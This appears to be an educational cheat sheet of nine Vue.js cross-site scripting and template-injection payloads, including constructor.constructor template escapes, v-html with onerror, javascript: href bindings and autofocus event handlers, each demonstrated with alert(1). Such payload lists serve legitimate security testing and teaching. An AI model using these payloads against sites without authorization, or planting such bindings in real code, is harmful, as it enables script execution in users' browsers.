# Vue.js XSS & Injection Scenarios

Note:
Vue escapes HTML by default. XSS vulnerabilities occur when using v-html,
unsafe bindings, or when user input is evaluated as template expressions.

# Purpose:
# Demonstrates how XSS can occur in Vue.js when unsafe bindings
# or template injections are used.

⚠️ For educational and authorized testing only.

----------------------------------------
1. Constructor-Based Injection
Payload: {{constructor.constructor('alert(1)')()}}
Description: Executes JavaScript via constructor.
Use Case: Template injection in Vue expressions.

----------------------------------------
2. Internal Function Abuse
Payload: {{_openBlock.constructor('alert(1)')()}}
Description: Uses internal Vue function reference.
Use Case: Advanced template injection scenarios.

----------------------------------------
3. v-html Injection
Payload: <div v-html="'<img src=x onerror=alert(1)>'"></div>
Description: Renders raw HTML.
Use Case: When user input is passed to v-html.

----------------------------------------
4. Dynamic Attribute Execution
Payload: <div :class="alert(1)"></div>
Description: Executes JS inside binding.
Use Case: If expressions are not sanitized.

----------------------------------------
5. JavaScript URI Binding
Payload: <a :href="'javascript:alert(1)'">Click me</a>
Description: Injects JS into href.
Use Case: When user controls URL input.

----------------------------------------
6. Conditional Execution
Payload: <template v-if="alert(1)"></template>
Description: Executes JS inside directive.
Use Case: Template logic injection.

----------------------------------------
7. v-bind Injection
Payload: <div v-bind:id="alert(1)"></div>
Description: Executes JS in bound attribute.
Use Case: Improper data binding usage.

----------------------------------------
8. Event Handler Injection
Payload: <form @submit="alert(1)"></form>
Description: Executes on form submission.
Use Case: User-controlled event binding.

----------------------------------------
9. Focus Event Execution
Payload: <input @focus="alert(1)" autofocus>
Description: Executes on focus.
Use Case: Auto-triggered interaction.

----------------------------------------